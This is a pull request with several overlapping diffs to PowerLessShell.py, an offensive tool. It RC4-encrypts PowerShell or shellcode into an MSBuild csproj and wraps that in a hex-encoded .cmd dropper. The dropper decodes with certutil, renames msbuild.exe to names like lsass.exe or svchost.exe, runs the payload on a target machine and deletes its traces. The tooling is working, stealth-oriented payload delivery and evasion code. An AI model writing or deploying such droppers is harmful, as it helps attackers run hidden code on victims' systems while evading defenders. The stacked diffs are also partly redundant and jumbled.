### PR TITLE
Fixed cmd file issues

### DIFF
--- a/PowerLessShell.py
+++ b/PowerLessShell.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python2
-# Author: Mr.Un1k0d3r - RingZer0 Team 2017
+# Author: Mr.Un1k0d3r - RingZer0 Team 2017 / blark's fork
 
 from __future__ import print_function
 import random
@@ -8,217 +8,214 @@ import base64
 import sys
 import re
 import os
+import click
+import ptpdb
 
 TEMPLATE = "include/template-"
-IS_CMD_ARGS = False
-USE_KNOWN_PROCESS_NAME = False
 
 class Generator:
+    def __init__(self, known_process):
+        self.error = 0
+        self.banner()
+        self.chunk_size = 1024
+        self.known_process = known_process
 
-        def __init__(self):
-                self.error = 0
-                self.banner()
-                self.chunk_size = 1024
+    def print_error(self, error):
+        click.secho("[!] {0}".format(error), fg="red", bold=True)
 
-        def clearscreen(self):
-                os.system("clear")
+    def banner(self):
+        click.secho( "PowerLessShell - More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team / blark's fork", fg="white", bold=True)
+        click.secho("            ___")
+        click.secho("        .-\"; ! ;\"-.")
+        click.secho("      .'!  : | :  !`.")
+        click.secho("     /\  ! : ! : !  /\\")
+        click.secho("    /\ |  ! :|: !  | /\\")
+        click.secho("   (  \ \ ; :!: ; / /  )")
+        click.secho("  ( `. \ | !:|:! | / .' )")
+        click.secho("  (`. \ \ \!:|:!/ / / .')")
+        click.secho("   \ `.`.\ |!|! |/,'.' /")
+        click.secho("    `._`.\\\!!!// .'_.'")
+        click.secho("       `.`.\\|//.'.'")
+        click.secho("        |`._`n'_.'|")
+        click.secho("        `----^----\"\n")
 
-        def print_error(self, error):
-                print("\033[91m[-] >>> %s\033[00m" % error)
+    def set_template(self, path):
+        self.data = self.load_file(path, True)
+        self.rand_vars()
 
-        def banner(self):
-                self.clearscreen()
-                print("\n\n\033[33mPowerLessShell - Remain Stealth")
-                print("         More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team\033[00m")
-                print("            ___")
-                print("        .-\"; ! ;\"-.")
-                print("      .'!  : | :  !`.")
-                print("     /\  ! : ! : !  /\\")
-                print("    /\ |  ! :|: !  | /\\")
-                print("   (  \ \ ; :!: ; / /  )")
-                print("  ( `. \ | !:|:! | / .' )")
-                print("  (`. \ \ \!:|:!/ / / .')")
-                print("   \ `.`.\ |!|! |/,'.' /")
-                print("    `._`.\\\!!!// .'_.'")
-                print("       `.`.\\|//.'.'")
-                print("        |`._`n'_.'|")
-                print("        `----^----\"\n\n")
+    def gen_str(self, size):
+        return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
 
-        def set_template(self, path):
-                self.data = self.load_file(path, True)
-                self.rand_vars()
+    def gen_process(self):
+        name = [
+            "csrss.exe", "explorer.exe", "iexplore.exe", "firefox.exe",
+            "chrome.exe", "lsass.exe", "services.exe", "smss.exe",
+            "spoolsv.exe", "svchost.exe", "winlogon.exe", "wininit.exe",
+            "taskmgr.exe", "conhost.exe", "OUTLOOK.exe", "WINWORD.exe",
+            "EXCEL.exe"
+        ]
+        return name[random.randrange(0, len(name) - 1)]
 
-        def gen_str(self, size):
-                return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
+    def rand_vars(self):
+        for i in reversed(range(1, 50)):
+            self.data = self.data.replace(
+                "VAR" + str(i), self.gen_str(random.randrange(5, 25)))
 
-        def gen_process(self):
-                name = ["csrss.exe","explorer.exe","iexplore.exe","firefox.exe","chrome.exe","lsass.exe","services.exe","smss.exe","spoolsv.exe","svchost.exe","winlogon.exe","wininit.exe","taskmgr.exe","conhost.exe","OUTLOOK.exe", "WINWORD.exe", "EXCEL.exe"]
-                return name[random.randrange(0, len(name) - 1)]
+    def get_output(self):
+        return self.data
 
-        def rand_vars(self):
-                for i in reversed(range(1, 50)):
-                        self.data = self.data.replace("VAR" + str(i), self.gen_str(random.randrange(5, 25)))
+    def gen_rc4_key(self, size):
+        return os.urandom(size)
 
-        def get_output(self):
-                return self.data
+    def format_rc4_key(self, key):
+        return "0x" + ", 0x".join(re.findall("..", key.encode("hex")))
 
-        def gen_rc4_key(self, size):
-                return os.urandom(size)
+    def load_file(self, path, fatal_error=False):
+        data = ""
+        try:
+            data = open(path, "rb").read()
+        except:
+            self.error = 1
+            self.print_error("%s file not found." % path)
+            if fatal_error:
+                exit(0)
+        return data
 
-        def format_rc4_key(self, key):
-                return "0x" + ", 0x".join(re.findall("..", key.encode("hex")))
+    def gen_final_cmd(self, csproj):
+        size = 0
+        filepath = []
+        for i in xrange(3):
+            filepath.append(self.gen_str(random.randrange(8, 18)))
 
-        def capture_input(self, mod = "", index = 0):
-                if IS_CMD_ARGS:
-                        return sys.argv[index]
-                if not mod == "":
-                        mod = "(%s)" % mod
-                return raw_input("\n%s>>> " % mod).strip()
+        # The cmd file first does a quck check for write access to the msbuild folder,
+        # if its unavailable use %temp% working directory instead. Next, check if the
+        # payload has already been decoded and skip re-creating the file if it exists.
+        payload = (
+            "@ECHO OFF\r\n"
+            "set w=0 && set p=\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\r\n"
+            "copy /Y NUL %p%\\{2} > NUL 2>&1 && set w=1\r\n"
+            "IF %w%==1 (del %p%\\{2}) ELSE (set p=%temp%)\r\n"
+            "set f0=%p%\\{0} && set f1=%p%\\{1}\r\n"
+            "IF EXIST %f1% (GOTO RUN)\r\n").format(filepath[0], filepath[1], filepath[2])
 
-        def load_file(self, path, fatal_error = False):
-                data = ""
-                try:
-                        data = open(path, "rb").read()
-                except:
-                        self.error = 1
-                        self.print_error("%s file not found." % path)
-                        if fatal_error:
-                                exit(0)
-                return data
+        data = csproj.encode("hex")
+        for index, chunk in enumerate(re.findall("." * self.chunk_size, data)):
+            payload += "echo {0} {1} %f0%\r\n".format(chunk, ">" if index == 0 else ">>")
+            size += self.chunk_size
+        if len(data) > size:
+            payload += "echo {0} >> %f0%".format(
+                data[(len(data) - size) * -1:])
+        if self.known_process:
+            msbuild = self.gen_process()
+        else:
+            msbuild = self.gen_str(random.randrange(5, 25)) + ".exe"
+        # Decode paylod, copy msbuild, launch payload, delete files
+        payload += (
+            "\r\ncertutil -decodehex %f0% %f1%\r\n"
+            "del %f0%\r\n"
+            "IF %w%==1 (copy %p%\\msbuild.exe %p%\\{0})\r\n"
+            ":RUN\r\n"
+            "IF %w%==1 (%p%\\{0} %f1%) ELSE (\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\msbuild.exe %f1%)\r\n"
+            "del %f1%").format(msbuild)
+        return payload
 
-        def get_error(self):
-                if IS_CMD_ARGS and self.error == 1:
-                        exit(0)
-                current = self.error
-                self.error = 0
-                return current
-
-        def gen_final_cmd(self, path):
-                size = 0
-                filepath = []
-                for i in xrange(3):
-                    filepath.append(self.gen_str(random.randrange(8, 18)))
-
-                # The cmd file first does a quck check for write access to the msbuild folder,
-                # if its unavailable use %temp% working directory instead. Next, check if the
-                # payload has already been decoded and skip re-creating the file if it exists.
-                payload = ("@ECHO OFF\r\n"
-                           "set w=0 && set p=\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\r\n"
-                           "copy /Y NUL %p%\\{2} > NUL 2>&1 && set w=1\r\n"
-                           "IF %w%==1 (del %p%\\{2}) ELSE (set p=%temp%)\r\n"
-                           "set f0=%p%\\{0} && set f1=%p%\\{1}\r\n"
-                           "IF EXIST %f1% (GOTO RUN)\r\n"
-                           ).format(filepath[0], filepath[1], filepath[2])
-
-                data = self.load_file(path).encode("hex")
-                for index, chunk in enumerate(re.findall("." * self.chunk_size, data)):
-                        payload += "echo {0} {1} %f0%\r\n".format(chunk, ">" if index == 0 else ">>")
-                        size += self.chunk_size
-                if len(data) > size:
-                        payload += "echo {0} >> %f0%".format(data[(len(data) - size) * -1:])
-
-                if USE_KNOWN_PROCESS_NAME:
-                        msbuild = self.gen_process()
-                else:
-                        msbuild = self.gen_str(random.randrange(5, 25)) + ".exe"
-                # Decode paylod, copy msbuild, launch payload, delete files
-                payload += ("\r\ncertutil -decodehex %f0% %f1%\r\n"
-                            "del %f0%\r\n"
-                            "IF %w%==1 (copy %p%\\msbuild.exe %p%\\{0})\r\n"
-                            ":RUN\r\n"
-                            "IF %w%==1 (%p%\\{0} %f1%) ELSE (\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\msbuild.exe %f1%)\r\n"
-                            "del %f1%"
-                            ).format(msbuild)
-                return payload
-
-        def set_condition(self, data, value = ""):
-                if value == "":
-                        return data.replace("[CONDITION]", "")
-                else:
-                        return data.replace("[CONDITION]", ' Condition="\'$(USERDOMAIN)\'==\'%s\'"' % value)
+    def set_condition(self, data, value=""):
+        if value == "":
+            return data.replace("[CONDITION]", "")
+        else:
+            return data.replace(
+                "[CONDITION]",
+                ' Condition="\'$(USERDOMAIN)\'==\'%s\'"' % value)
 
 class RC4:
+    def KSA(self, key):
+        keylength = len(key)
+        S = range(256)
+        j = 0
+        for i in range(256):
+            j = (j + S[i] + key[i % keylength]) % 256
+            S[i], S[j] = S[j], S[i]
+        return S
 
-        def KSA(self, key):
-                keylength = len(key)
-                S = range(256)
-                j = 0
-                for i in range(256):
-                        j = (j + S[i] + key[i % keylength]) % 256
-                        S[i], S[j] = S[j], S[i]
-                return S
+    def PRGA(self, S):
+        i = 0
+        j = 0
+        while True:
+            i = (i + 1) % 256
+            j = (j + S[i]) % 256
+            S[i], S[j] = S[j], S[i]
 
-        def PRGA(self, S):
-                i = 0
-                j = 0
-                while True:
-                        i = (i + 1) % 256
-                        j = (j + S[i]) % 256
-                        S[i], S[j] = S[j], S[i]
+            K = S[(S[i] + S[j]) % 256]
+            yield K
 
-                        K = S[(S[i] + S[j]) % 256]
-                        yield K
+    def Encrypt(self, plaintext, key):
+        output = ""
+        key = [ord(c) for c in key]
+        S = self.KSA(key)
+        keystream = self.PRGA(S)
+        for c in plaintext:
+            output = output + chr(ord(c) ^ keystream.next())
+        return output
 
-        def Encrypt(self, plaintext, key):
-                output = ""
-                key = [ord(c) for c in key]
-                S = self.KSA(key)
-                keystream = self.PRGA(S)
-                for c in plaintext:
-                        output = output + chr(ord(c) ^ keystream.next())
-                return output
+def set_kind(ctx, param, value):
+    kind = filter(lambda x: x.name == 'kind', ctx.command.params)[0]
+    _, file_ext = os.path.splitext(value.name)
+    if file_ext == '.ps1':
+        kind.default = 'ps'
+    elif file_ext == '.bin':
+        kind.default = 'sc'
+    else:
+        kind.required = True
+    return value
+
+@click.command()
+@click.argument('payload', type=click.File('rb'), default="beacon.bin", callback=set_kind)
+@click.argument('outfile', type=click.File('wb'), default="./output/payload.cmd")
+@click.option('--kind', '-k', type=click.Choice(['ps', 'sc']), help="Powershell (ps) or shellcode (sc) input file, script tries to autodetect based on extension (ps1=powershell, bin=shellcode).")
+@click.option('--known-process', is_flag=True, default=False, help="Disguise msbuild as a common Windows executable")
+@click.option('--domain', '-d', default='', help="Domain name to check for prior to running payload")
+@click.option('--csproj-out', is_flag=True, default=False, help="Also output the csproj file")
+def main(payload, outfile, kind, known_process, domain, csproj_out):
+    """
+    Accepts a powershell script or raw shellcode, then encrypts with RC4, base64
+    encodes, and sticks into a csproj template to be executed as inline task on
+    the client side. The csproj is then hex encoded and output as a cmd file to
+    be launched on a target machine using wmi or schtask, etc. The command file
+    uses certutil to decode the csproj, renames msbuild (if admin), and then launch
+    the payload.
+
+    \b
+    [PAYLOAD] defaults to ./beacon.bin
+    [OUTFILE] defaults to ./output/payload.cmd
+    """
+
+    output_type = {'sc': 'shellcode', 'ps': 'powershell'}
+    data = payload.read()
+    gen = Generator(known_process=known_process)
+    click.secho("Using payload file {0}, type {1}".format(payload.name, output_type[kind]))
+    if kind == 'sc':
+        template_path = TEMPLATE + "shellcode.csproj"
+    else:
+        template_path = TEMPLATE + "powershell.csproj"
+    gen.set_template(template_path)
+    rc4 = RC4()
+    key = gen.gen_rc4_key(32)
+    cipher = base64.b64encode(rc4.Encrypt(data, key))
+    csproj = gen.get_output()
+    csproj = csproj.replace("[KEY]", gen.format_rc4_key(key)).replace("[PAYLOAD]", cipher)
+    condition = domain
+    csproj = gen.set_condition(csproj, condition)
+    if csproj_out:
+        f = '{0}/{1}.csproj'.format(os.path.dirname(outfile.name) or ".", os.path.splitext(os.path.basename(outfile.name))[0])
+        with open(f, 'wb') as csproj_file:
+            click.secho("Writing csproj file {0}".format(f))
+            csproj_file.write(csproj)
+    else:
+        click.secho("Not writing csproj to disk, if you want this use the --csproj switch")
+    cmd = gen.gen_final_cmd(csproj)
+    click.secho("Writing {}".format(outfile.name))
+    outfile.write(cmd)
+    outfile.flush()
 
 if __name__ == "__main__":
-        gen = Generator()
-        input_name = "PowerShell script"
-        data = ""
-
-        if len(sys.argv) >= 4:
-                IS_CMD_ARGS = True
-                if "-knownprocess" in sys.argv:
-                        USE_KNOWN_PROCESS_NAME = True
-        try:
-                if gen.capture_input("Set payload type '(p)owershell, (s)hellcode'", 3) == "s".lower():
-                        input_name = "raw shellcode file"
-                        TEMPLATE = TEMPLATE + "shellcode.csproj"
-                else:
-                        TEMPLATE = TEMPLATE + "powershell.csproj"
-
-                gen.set_template(TEMPLATE)
-                rc4 = RC4()
-                key = gen.gen_rc4_key(32)
-
-                data_path = gen.capture_input("Path to the %s" % input_name, 1)
-                data = gen.load_file(data_path, False)
-                while gen.get_error():
-                        data_path = gen.capture_input("Path to the %s" % input_name)
-                        data = gen.load_file(data_path, False)
-
-                outfile = gen.capture_input("Path for the generated MsBuild out file", 2)
-                cipher = base64.b64encode(rc4.Encrypt(data, key))
-                output = gen.get_output()
-                output = output.replace("[KEY]", gen.format_rc4_key(key)).replace("[PAYLOAD]", cipher)
-                condition = gen.capture_input("Set USERDOMAIN condition (Default '')", 3).strip()
-                output = gen.set_condition(output, condition)
-
-                try:
-                        open(outfile, "wb").write(output)
-                except:
-                        gen.print_error("Failed to write the output to %s" % outfile)
-
-                if not IS_CMD_ARGS:
-                        answer = gen.capture_input("Use known process name to perform MsBuild renaming (Default: False)").lower()
-                        if answer == "true":
-                                USE_KNOWN_PROCESS_NAME = True
-
-                outcmd = gen.gen_final_cmd(outfile)
-                try:
-                        open(outfile + ".cmd", "wb").write(outcmd)
-                except:
-                        gen.print_error("Failed to write the output to %s.cmd" % outfile)
-
-                print("\n\n[+] %s was generated.\n[+] %s.cmd was generated.\n[+] Run the command inside of %s.cmd on the target system using WMI." % (outfile, outfile, outfile))
-        except KeyboardInterrupt:
-                        print("")
-                        gen.print_error("Exiting")
-                        exit(0)
+    main()

--- a/PowerLessShell.py
+++ b/PowerLessShell.py
@@ -1,6 +1,5 @@
 #!/usr/bin/env python2
 # Author: Mr.Un1k0d3r - RingZer0 Team 2017
-# cmd file enhancements by blark
 
 from __future__ import print_function
 import random
@@ -96,12 +95,13 @@ class Generator:
 
         def gen_final_cmd(self, path):
                 filepath = []
-                filepath.append(self.gen_str(random.randrange(5, 25)))
-                filepath.append(self.gen_str(random.randrange(5, 25)))
-                filepath.append(self.gen_str(random.randrange(5, 25)))
+                filepath.append(self.gen_str(random.randrange(8, 18)))
+                filepath.append(self.gen_str(random.randrange(8, 18)))
+                filepath.append(self.gen_str(random.randrange(8, 18)))
 
                 # if user is SYSTEM then use the msbuild path and perform msbuild copy
                 # otherwise work out of %temp% and don't copy the binary
+                # finally, if the decoded file already exists, just run it
                 payload = ("@ECHO OFF\n"
                            "set p=\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\n"
                            "copy /Y NUL %p%\\{2} > NUL 2>&1 && set SYSTEM=1\n"
@@ -123,7 +123,7 @@ class Generator:
                         msbuild = self.gen_process()
                 else:
                         msbuild = self.gen_str(random.randrange(5, 25)) + ".exe"
-                # decode paylod, copy msbuild, launch payload with copied msbuild
+                # decode paylod, copy msbuild, launch payload
                 payload += ("\ncertutil -decodehex %f0% %f1%\n"
                             "IF %SYSTEM%==1 (copy %p%\\msbuild.exe %p%\\{0})\n"
                             ":RUN\n"

--- a/PowerLessShell.py
+++ b/PowerLessShell.py
@@ -1,5 +1,6 @@
 #!/usr/bin/env python2
 # Author: Mr.Un1k0d3r - RingZer0 Team 2017
+# with cmd enhancements by blark
 
 from __future__ import print_function
 import random
@@ -94,6 +95,7 @@ class Generator:
                 return current
 
         def gen_final_cmd(self, path):
+                size = 0
                 filepath = []
                 filepath.append(self.gen_str(random.randrange(8, 18)))
                 filepath.append(self.gen_str(random.randrange(8, 18)))
@@ -110,7 +112,6 @@ class Generator:
                            "set f1=%p%\\{1}\r\n"
                            "IF EXIST %f1% (GOTO RUN)\r\n"
                            ).format(filepath[0], filepath[1], filepath[2])
-                size = 0
 
                 data = self.load_file(path).encode("hex")
                 for index, chunk in enumerate(re.findall("." * self.chunk_size, data)):

--- a/PowerLessShell.py
+++ b/PowerLessShell.py
@@ -1,5 +1,8 @@
+#!/usr/bin/env python2
 # Author: Mr.Un1k0d3r - RingZer0 Team 2017
+# cmd file enhancements by blark
 
+from __future__ import print_function
 import random
 import string
 import base64
@@ -13,195 +16,209 @@ USE_KNOWN_PROCESS_NAME = False
 
 class Generator:
 
-	def __init__(self):
-		self.error = 0
-		self.banner()
-		self.chunk_size = 1024	
-		
-	def clearscreen(self):
-		os.system("clear")	
+        def __init__(self):
+                self.error = 0
+                self.banner()
+                self.chunk_size = 1024
 
-	def print_error(self, error):
-		print "\033[91m[-] >>> %s\033[00m" % error
-		
-	def banner(self):
-		self.clearscreen()
-		print "\n\n\033[33mPowerLessShell - Remain Stealth"
-		print "         More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team\033[00m"
-		print "            ___"
-		print "        .-\"; ! ;\"-."
-		print "      .'!  : | :  !`."
-		print "     /\  ! : ! : !  /\\"
-		print "    /\ |  ! :|: !  | /\\"
-		print "   (  \ \ ; :!: ; / /  )"
-		print "  ( `. \ | !:|:! | / .' )"
-		print "  (`. \ \ \!:|:!/ / / .')"
-		print "   \ `.`.\ |!|! |/,'.' /"
-		print "    `._`.\\\!!!// .'_.'"
-		print "       `.`.\\|//.'.'"
-		print "        |`._`n'_.'|"
-		print "        `----^----\"\n\n"
-			
-	def set_template(self, path):
-		self.data = self.load_file(path, True)
-		self.rand_vars()
-		
-	def gen_str(self, size):
-		return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) 
+        def clearscreen(self):
+                os.system("clear")
 
-	def gen_process(self):
-		name = ["csrss.exe","explorer.exe","iexplore.exe","firefox.exe","chrome.exe","lsass.exe","services.exe","smss.exe","spoolsv.exe","svchost.exe","winlogon.exe","wininit.exe","taskmgr.exe","conhost.exe","OUTLOOK.exe", "WINWORD.exe", "EXCEL.exe"]
-		return name[random.randrange(0, len(name) - 1)]
-		
-	def rand_vars(self):
-		for i in reversed(range(1, 50)):
-			self.data = self.data.replace("VAR" + str(i), self.gen_str(random.randrange(5, 25)))
-			
-	def get_output(self):
-		return self.data
-		
-	def gen_rc4_key(self, size):
-		return os.urandom(size)
-		
-	def format_rc4_key(self, key):
-		return "0x" + ", 0x".join(re.findall("..", key.encode("hex")))
-		
-	def capture_input(self, mod = "", index = 0):
-		if IS_CMD_ARGS:
-			return sys.argv[index]
-		if not mod == "":
-			mod = "(%s)" % mod
-		return raw_input("\n%s>>> " % mod).strip()
-		
-	def load_file(self, path, fatal_error = False):
-		data = ""
-		try:
-			data = open(path, "rb").read()
-		except:
-			self.error = 1
-			self.print_error("%s file not found." % path)
-			if fatal_error:
-				exit(0)
-		return data
-		
-	def get_error(self):
-		if IS_CMD_ARGS and self.error == 1:
-			exit(0)
-		current = self.error
-		self.error = 0
-		return current
-		
-	def gen_final_cmd(self, path):
-		payload = "cd C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ && "
-		size = 0
+        def print_error(self, error):
+                print("\033[91m[-] >>> %s\033[00m" % error)
 
-		filepath = []
-		filepath.append(self.gen_str(random.randrange(5, 25)))
-		filepath.append(self.gen_str(random.randrange(5, 25)))
+        def banner(self):
+                self.clearscreen()
+                print("\n\n\033[33mPowerLessShell - Remain Stealth")
+                print("         More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team\033[00m")
+                print("            ___")
+                print("        .-\"; ! ;\"-.")
+                print("      .'!  : | :  !`.")
+                print("     /\  ! : ! : !  /\\")
+                print("    /\ |  ! :|: !  | /\\")
+                print("   (  \ \ ; :!: ; / /  )")
+                print("  ( `. \ | !:|:! | / .' )")
+                print("  (`. \ \ \!:|:!/ / / .')")
+                print("   \ `.`.\ |!|! |/,'.' /")
+                print("    `._`.\\\!!!// .'_.'")
+                print("       `.`.\\|//.'.'")
+                print("        |`._`n'_.'|")
+                print("        `----^----\"\n\n")
 
-		data = self.load_file(path).encode("hex")
-		for chunk in re.findall("." * self.chunk_size, data):
-		        payload += "echo %s >> %s && " % (chunk, filepath[0])
-		        size += self.chunk_size
+        def set_template(self, path):
+                self.data = self.load_file(path, True)
+                self.rand_vars()
 
-		if len(data) > size:
-			payload += "echo %s >> %s" % (data[(len(data) - size) * -1:], filepath[0])
+        def gen_str(self, size):
+                return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
 
-		if USE_KNOWN_PROCESS_NAME:
-			msbuild = self.gen_process()
-		else:
-			msbuild = self.gen_str(random.randrange(5, 25)) + ".exe"
-		payload += " && certutil -decodehex %s %s && copy msbuild.exe %s && %s %s && del %s && del %s && del %s" % (filepath[0], filepath[1], msbuild, msbuild, filepath[1], msbuild, filepath[1], filepath[0])
-		return payload
-		
-	def set_condition(self, data, value = ""):
-		if value == "":
-			return data.replace("[CONDITION]", "")
-		else:
-			return data.replace("[CONDITION]", ' Condition="\'$(USERDOMAIN)\'==\'%s\'"' % value)
+        def gen_process(self):
+                name = ["csrss.exe","explorer.exe","iexplore.exe","firefox.exe","chrome.exe","lsass.exe","services.exe","smss.exe","spoolsv.exe","svchost.exe","winlogon.exe","wininit.exe","taskmgr.exe","conhost.exe","OUTLOOK.exe", "WINWORD.exe", "EXCEL.exe"]
+                return name[random.randrange(0, len(name) - 1)]
+
+        def rand_vars(self):
+                for i in reversed(range(1, 50)):
+                        self.data = self.data.replace("VAR" + str(i), self.gen_str(random.randrange(5, 25)))
+
+        def get_output(self):
+                return self.data
+
+        def gen_rc4_key(self, size):
+                return os.urandom(size)
+
+        def format_rc4_key(self, key):
+                return "0x" + ", 0x".join(re.findall("..", key.encode("hex")))
+
+        def capture_input(self, mod = "", index = 0):
+                if IS_CMD_ARGS:
+                        return sys.argv[index]
+                if not mod == "":
+                        mod = "(%s)" % mod
+                return raw_input("\n%s>>> " % mod).strip()
+
+        def load_file(self, path, fatal_error = False):
+                data = ""
+                try:
+                        data = open(path, "rb").read()
+                except:
+                        self.error = 1
+                        self.print_error("%s file not found." % path)
+                        if fatal_error:
+                                exit(0)
+                return data
+
+        def get_error(self):
+                if IS_CMD_ARGS and self.error == 1:
+                        exit(0)
+                current = self.error
+                self.error = 0
+                return current
+
+        def gen_final_cmd(self, path):
+                filepath = []
+                filepath.append(self.gen_str(random.randrange(5, 25)))
+                filepath.append(self.gen_str(random.randrange(5, 25)))
+                filepath.append(self.gen_str(random.randrange(5, 25)))
+
+                # if user is SYSTEM then use the msbuild path and perform msbuild copy
+                # otherwise work out of %temp% and don't copy the binary
+                payload = ("@ECHO OFF\n"
+                           "set p=\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\n"
+                           "copy /Y NUL %p%\\{2} > NUL 2>&1 && set SYSTEM=1\n"
+                           "IF %SYSTEM%==1 (del %p%\\{2}) ELSE (set p=%temp%)\n"
+                           "set f0=%p%\\{0}\n"
+                           "set f1=%p%\\{1}\n"
+                           "IF EXIST %f1% (GOTO RUN)\n"
+                           ).format(filepath[0], filepath[1], filepath[2])
+                size = 0
+
+                data = self.load_file(path).encode("hex")
+                for index, chunk in enumerate(re.findall("." * self.chunk_size, data)):
+                        payload += "echo {0} {1} %f0%\n".format(chunk, ">" if index == 0 else ">>")
+                        size += self.chunk_size
+                if len(data) > size:
+                        payload += "echo {0} >> %f0%".format(data[(len(data) - size) * -1:])
+
+                if USE_KNOWN_PROCESS_NAME:
+                        msbuild = self.gen_process()
+                else:
+                        msbuild = self.gen_str(random.randrange(5, 25)) + ".exe"
+                # decode paylod, copy msbuild, launch payload with copied msbuild
+                payload += ("\ncertutil -decodehex %f0% %f1%\n"
+                            "IF %SYSTEM%==1 (copy %p%\\msbuild.exe %p%\\{0})\n"
+                            ":RUN\n"
+                            "IF %SYSTEM%==1 (%p%\\{0} %f1%) ELSE (\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\msbuild.exe %f1%)"
+                            ).format(msbuild)
+                return payload
+
+        def set_condition(self, data, value = ""):
+                if value == "":
+                        return data.replace("[CONDITION]", "")
+                else:
+                        return data.replace("[CONDITION]", ' Condition="\'$(USERDOMAIN)\'==\'%s\'"' % value)
 
 class RC4:
 
-	def KSA(self, key):
-		keylength = len(key)
-		S = range(256)
-		j = 0
-		for i in range(256):
-			j = (j + S[i] + key[i % keylength]) % 256
-			S[i], S[j] = S[j], S[i]
-		return S
-	
-	def PRGA(self, S):
-		i = 0
-		j = 0
-		while True:
-			i = (i + 1) % 256
-			j = (j + S[i]) % 256
-			S[i], S[j] = S[j], S[i] 
+        def KSA(self, key):
+                keylength = len(key)
+                S = range(256)
+                j = 0
+                for i in range(256):
+                        j = (j + S[i] + key[i % keylength]) % 256
+                        S[i], S[j] = S[j], S[i]
+                return S
 
-			K = S[(S[i] + S[j]) % 256]
-			yield K
+        def PRGA(self, S):
+                i = 0
+                j = 0
+                while True:
+                        i = (i + 1) % 256
+                        j = (j + S[i]) % 256
+                        S[i], S[j] = S[j], S[i]
 
-	def Encrypt(self, plaintext, key):
-		output = ""
-		key = [ord(c) for c in key]
-		S = self.KSA(key)
-		keystream = self.PRGA(S)
-		for c in plaintext:
-			output = output + chr(ord(c) ^ keystream.next())
-		return output	
-		
+                        K = S[(S[i] + S[j]) % 256]
+                        yield K
+
+        def Encrypt(self, plaintext, key):
+                output = ""
+                key = [ord(c) for c in key]
+                S = self.KSA(key)
+                keystream = self.PRGA(S)
+                for c in plaintext:
+                        output = output + chr(ord(c) ^ keystream.next())
+                return output
+
 if __name__ == "__main__":
-	gen = Generator()
-	input_name = "PowerShell script"
-	data = ""
-	
-	if len(sys.argv) >= 4:
-		IS_CMD_ARGS = True
-		if "-knownprocess" in sys.argv:
-			USE_KNOWN_PROCESS_NAME = True
-	try:
-		if gen.capture_input("Set payload type 'powershell, shellcode'", 3) == "shellcode".lower():
-			input_name = "raw shellcode file"
-			TEMPLATE = TEMPLATE + "shellcode.csproj"
-		else:
-			TEMPLATE = TEMPLATE + "powershell.csproj"
+        gen = Generator()
+        input_name = "PowerShell script"
+        data = ""
 
-		gen.set_template(TEMPLATE)
-		rc4 = RC4()
-		key = gen.gen_rc4_key(32)
-		
-		data_path = gen.capture_input("Path to the %s" % input_name, 1)
-		data = gen.load_file(data_path, False)	
-		while gen.get_error():
-			data_path = gen.capture_input("Path to the %s" % input_name)
-			data = gen.load_file(data_path, False)
-		
-		outfile = gen.capture_input("Path for the generated MsBuild out file", 2)
-		cipher = base64.b64encode(rc4.Encrypt(data, key))
-		output = gen.get_output()
-		output = output.replace("[KEY]", gen.format_rc4_key(key)).replace("[PAYLOAD]", cipher)
-		condition = gen.capture_input("Set USERDOMAIN condition (Default '')", 3).strip()
-		output = gen.set_condition(output, condition)
-		
-		try:
-			open(outfile, "wb").write(output)
-		except:
-			gen.print_error("Failed to write the output to %s" % outfile)
+        if len(sys.argv) >= 4:
+                IS_CMD_ARGS = True
+                if "-knownprocess" in sys.argv:
+                        USE_KNOWN_PROCESS_NAME = True
+        try:
+                if gen.capture_input("Set payload type '(p)owershell, (s)hellcode'", 3) == "s".lower():
+                        input_name = "raw shellcode file"
+                        TEMPLATE = TEMPLATE + "shellcode.csproj"
+                else:
+                        TEMPLATE = TEMPLATE + "powershell.csproj"
 
-		if not IS_CMD_ARGS:
-			answer = gen.capture_input("Use known process name to perform MsBuild renaming (Default: False)").lower()
-			if answer == "true":
-				USE_KNOWN_PROCESS_NAME = True
-			
-		outcmd = gen.gen_final_cmd(outfile)
-		try:
-			open(outfile + ".cmd", "wb").write(outcmd)
-		except:
-			gen.print_error("Failed to write the output to %s.cmd" % outfile)
+                gen.set_template(TEMPLATE)
+                rc4 = RC4()
+                key = gen.gen_rc4_key(32)
 
-		print "\n\n[+] %s was generated.\n[+] %s.cmd was generated.\n[+] Run the command inside of %s.cmd on the target system using WMI." % (outfile, outfile, outfile)			
-	except KeyboardInterrupt:
-			print ""
-			gen.print_error("Exiting")
-			exit(0)
+                data_path = gen.capture_input("Path to the %s" % input_name, 1)
+                data = gen.load_file(data_path, False)
+                while gen.get_error():
+                        data_path = gen.capture_input("Path to the %s" % input_name)
+                        data = gen.load_file(data_path, False)
+
+                outfile = gen.capture_input("Path for the generated MsBuild out file", 2)
+                cipher = base64.b64encode(rc4.Encrypt(data, key))
+                output = gen.get_output()
+                output = output.replace("[KEY]", gen.format_rc4_key(key)).replace("[PAYLOAD]", cipher)
+                condition = gen.capture_input("Set USERDOMAIN condition (Default '')", 3).strip()
+                output = gen.set_condition(output, condition)
+
+                try:
+                        open(outfile, "wb").write(output)
+                except:
+                        gen.print_error("Failed to write the output to %s" % outfile)
+
+                if not IS_CMD_ARGS:
+                        answer = gen.capture_input("Use known process name to perform MsBuild renaming (Default: False)").lower()
+                        if answer == "true":
+                                USE_KNOWN_PROCESS_NAME = True
+
+                outcmd = gen.gen_final_cmd(outfile)
+                try:
+                        open(outfile + ".cmd", "wb").write(outcmd)
+                except:
